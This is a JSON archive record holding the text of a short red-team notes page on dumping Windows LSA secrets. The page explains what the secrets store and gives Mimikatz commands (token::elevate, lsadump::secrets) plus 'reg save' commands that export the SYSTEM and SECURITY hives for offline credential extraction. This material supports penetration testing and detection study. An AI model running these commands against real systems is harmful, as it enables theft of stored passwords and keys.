{
	"id": "a0989adc-d95a-4bb6-87f7-35e0c22ea606",
	"created_at": "2026-04-06T00:09:55.524219Z",
	"updated_at": "2026-04-10T13:13:06.982103Z",
	"deleted_at": null,
	"sha1_hash": "9f466f46707fa39f52043bd361b33893a9b243ad",
	"title": "Dumping LSA Secrets | Red Team Notes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 54493,
	"plain_text": "Dumping LSA Secrets | Red Team Notes\r\nPublished: 2019-03-12 · Archived: 2026-04-02 11:20:40 UTC\r\n1. offensive security\r\n2. Credential Access \u0026 Dumping\r\nDumping LSA Secrets\r\nWhat is stored in LSA secrets?\r\nOriginally, the secrets contained cached domain records. Later, Windows developers expanded the\r\napplication area for the storage. At this moment, they can store PC users' text passwords, service\r\naccount passwords (for example, those that must be run by a certain user to perform certain tasks),\r\nInternet Explorer passwords, RAS connection passwords, SQL and CISCO passwords, SYSTEM\r\naccount passwords, private user data like EFS encryption keys, and a lot more. For example, the\r\nNL$KM secret contains the cached domain password encryption key.\r\nLSA Secrets are stored in registry:\r\nHKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets\r\nSecrets can be dumped from memory like so:\r\ntoken::elevate\r\nlsadump::secrets\r\nLSA secrets can be dumped from registry hives likes so:\r\nreg save HKLM\\SYSTEM system \u0026 reg save HKLM\\security security\r\nlsadump::secrets /system:c:\\temp\\system /security:c:\\temp\\security\r\nhttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets\r\nPage 1 of 2\n\nThis site uses cookies to deliver its service and to analyze traffic. By browsing this site, you accept the privacy\r\npolicy.\r\nSource: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets\r\nhttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets"
	],
	"report_names": [
		"dumping-lsa-secrets"
	],
	"threat_actors": [],
	"ts_created_at": 1775434195,
	"ts_updated_at": 1775826786,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f466f46707fa39f52043bd361b33893a9b243ad.pdf",
		"text": "https://archive.orkl.eu/9f466f46707fa39f52043bd361b33893a9b243ad.txt",
		"img": "https://archive.orkl.eu/9f466f46707fa39f52043bd361b33893a9b243ad.jpg"
	}
}